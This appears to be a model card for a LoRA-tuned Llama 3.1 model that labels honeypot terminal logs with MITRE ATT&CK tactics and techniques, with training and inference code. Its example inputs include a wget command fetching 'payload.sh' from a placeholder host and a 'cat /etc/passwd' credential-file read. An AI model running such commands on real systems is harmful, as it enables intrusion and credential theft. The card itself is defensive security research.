LLM-Enhanced Honeypot Log Analysis Model
Model Description
This model is a fine-tuned version of Llama 3.1 8B Instruct, specialized for analyzing honeypot logs and generating MITRE ATT&CK framework annotations. It was developed as part of a research project at Queen's University Belfast investigating automated security log analysis using Large Language Models.
Key Features
- MITRE ATT&CK Annotation: Automatically generates structured annotations for security events
- Honeypot Log Analysis: Specialized in analyzing Unix terminal logs from honeypot systems
- LoRA Fine-tuning: Uses Low-Rank Adaptation for efficient parameter updates
- Research-Grade: Developed for academic research in cybersecurity and AI
Model Details
Base Model
- Base Model: unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit
- Model Size: 8B parameters
- Architecture: Llama 3.1 with Instruct tuning
- Quantization: 4-bit quantization for efficiency
Fine-tuning Details
- Method: LoRA (Low-Rank Adaptation)
- LoRA Rank: 32
- LoRA Alpha: 32
- LoRA Dropout: 0
- Learning Rate: 0.00012
- Batch Size: 2
- Gradient Accumulation: 4
- Max Steps: 100
- Optimizer: adamw_8bit
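For reference, the hyperparameters above map onto the standard Unsloth + TRL fine-tuning workflow roughly as follows. This is a minimal sketch, not the project's actual training script: the dataset file, sequence length, LoRA target modules, and other unlisted settings are assumptions, and only the values documented above (rank, alpha, dropout, learning rate, batch size, gradient accumulation, max steps, optimizer) come from this card.

# Minimal sketch of the fine-tuning configuration (assumptions noted inline).
from unsloth import FastLanguageModel
from datasets import load_dataset
from transformers import TrainingArguments
from trl import SFTTrainer

model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="unsloth/Meta-Llama-3.1-8B-Instruct-unsloth-bnb-4bit",
    max_seq_length=2048,   # assumption: matches the inference setting shown below
    load_in_4bit=True,
)

# Attach LoRA adapters with the rank/alpha/dropout documented above.
model = FastLanguageModel.get_peft_model(
    model,
    r=32,
    lora_alpha=32,
    lora_dropout=0,
    target_modules=["q_proj", "k_proj", "v_proj", "o_proj",
                    "gate_proj", "up_proj", "down_proj"],  # common Unsloth default; an assumption
    bias="none",
    use_gradient_checkpointing=True,
    random_state=3407,  # arbitrary illustrative seed
)

# Hypothetical dataset path; the curated, annotated honeypot logs are not published here.
dataset = load_dataset("json", data_files="annotated_honeypot_logs.jsonl", split="train")

trainer = SFTTrainer(
    model=model,
    tokenizer=tokenizer,
    train_dataset=dataset,
    dataset_text_field="text",  # assumes each record is pre-formatted into a single prompt/response string
    max_seq_length=2048,
    args=TrainingArguments(
        per_device_train_batch_size=2,
        gradient_accumulation_steps=4,
        max_steps=100,
        learning_rate=1.2e-4,
        optim="adamw_8bit",
        logging_steps=10,
        output_dir="outputs",
    ),
)
trainer.train()

Exact trainer wiring may differ slightly across trl versions; the hyperparameter values are the part taken from this card.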
Training Data
The model was trained on a curated dataset of honeypot logs with human-annotated MITRE ATT&CK framework labels. The training data includes:
- Unix terminal command logs from honeypot systems
- Structured annotations for 6 key MITRE ATT&CK fields
- Balanced representation of different attack tactics and techniques
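For illustration, a single training record might look like the sketch below. The schema is an assumption: this card names four annotation fields in the inference prompt (Tactic, Technique, Sub-technique, Description) and states there are six in total, so the remaining fields are left as placeholders.

# Illustrative record layout only; this is not the project's actual schema.
example_record = {
    "command": "cat /etc/passwd",
    "timestamp": "2025-01-01T00:00:00Z",
    "source_ip": "198.51.100.7",
    "annotation": {
        "tactic": "Credential Access",
        "technique": "T1003 - OS Credential Dumping",
        "sub_technique": "T1003.008 - /etc/passwd and /etc/shadow",
        "description": "Attacker reads the local account database to harvest credentials.",
        # ... the two remaining annotated MITRE ATT&CK fields are not named in this card
    },
}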
Usage
Installation
pip install transformers torch unsloth
Loading the Model
from unsloth import FastLanguageModel
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="JustinYuann/CSC4006-CyberSecAnnotation",
    max_seq_length=2048,
    dtype=None,
    load_in_4bit=True,
)
Inference
# Enable inference mode
FastLanguageModel.for_inference(model)
# Format your input (fill the placeholders with values from your own log)
prompt = '''Below is a Unix terminal command log from a honeypot system. Please analyze it and provide MITRE ATT&CK framework annotations.
Command: {command}
Timestamp: {timestamp}
Source IP: {source_ip}
Please provide:
1. Tactic
2. Technique
3. Sub-technique
4. Description'''

# Illustrative example values only
prompt = prompt.format(
    command="wget http://198.51.100.7/payload.sh",
    timestamp="2025-01-01T00:00:00Z",
    source_ip="198.51.100.7",
)

inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=1024, temperature=0.7, do_sample=True)
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
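Because the prompt requests a numbered answer, the annotation can be pulled out of the decoded text with a small parser such as the sketch below. The line matching assumes the model echoes the four numbered fields requested above, so verify it against real outputs before relying on it.

import re

# Hypothetical parser: assumes the model answers with the four numbered items
# requested in the prompt, one per line (e.g. "1. Tactic: Execution").
def parse_annotation(response: str, prompt: str) -> dict:
    answer = response[len(prompt):]  # drop the echoed prompt before parsing
    annotation = {}
    for number, name in enumerate(["tactic", "technique", "sub_technique", "description"], start=1):
        match = re.search(rf"^{number}\.\s*(.+)$", answer, flags=re.MULTILINE)
        if match:
            annotation[name] = match.group(1).strip()
    return annotation

print(parse_annotation(response, prompt))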
Evaluation
The model has been evaluated on multiple metrics:
- Overall MITRE Accuracy: Novel composite metric combining the accuracies of all 6 MITRE ATT&CK fields (one possible formulation is sketched after this list)
- Confusion Matrix Analysis: Visual analysis of tactics classification performance
- Field-level Accuracy: Individual accuracy for each MITRE ATT&CK field
- Human Evaluation: Expert validation of generated annotations
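How the composite score is combined is not spelled out in this card; a minimal sketch, assuming it is the unweighted mean of the six per-field accuracies, would be:

# Hypothetical reading of the composite metric: an unweighted mean of the six
# per-field accuracies. The project may weight or combine the fields differently.
def overall_mitre_accuracy(field_accuracies: dict) -> float:
    return sum(field_accuracies.values()) / len(field_accuracies)

# Illustrative values only (field_5/field_6 are placeholder names, not real fields or results).
print(overall_mitre_accuracy({
    "tactic": 0.90, "technique": 0.82, "sub_technique": 0.71,
    "description": 0.78, "field_5": 0.75, "field_6": 0.73,
}))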
Limitations
- Specialized for honeypot log analysis - may not generalize to other security contexts
- Requires structured input format for optimal performance
- Training data limited to specific honeypot configurations
- May exhibit biases present in training data
Ethical Considerations
This model is designed for defensive cybersecurity research and should be used responsibly:
- Intended for legitimate security research and defense applications
- Should not be used for malicious purposes or unauthorized access
- Users should validate outputs before making security decisions
- Consider privacy implications when analyzing logs
Citation
If you use this model in your research, please cite:
@misc{llm_honeypot_analysis_2025,
  title={LLM-Enhanced Honeypot Log Analysis System},
  author={[Student Name]},
  year={2025},
  institution={Queen's University Belfast},
  course={CSC4006 - Research Project},
  url={https://gitlab.eeecs.qub.ac.uk/[student-id]/CSC4006}
}
License
This model is released under the MIT License. See the LICENSE file for details.
Contact
For questions or issues:
- Repository: https://gitlab.eeecs.qub.ac.uk/40285272/CSC4006
- Institution: Queen's University Belfast
- Course: CSC4006 - Research Project
Acknowledgments
- Built using the Unsloth library for efficient training
- Based on Meta's Llama 3.1 model
- Developed as part of cybersecurity research at Queen's University Belfast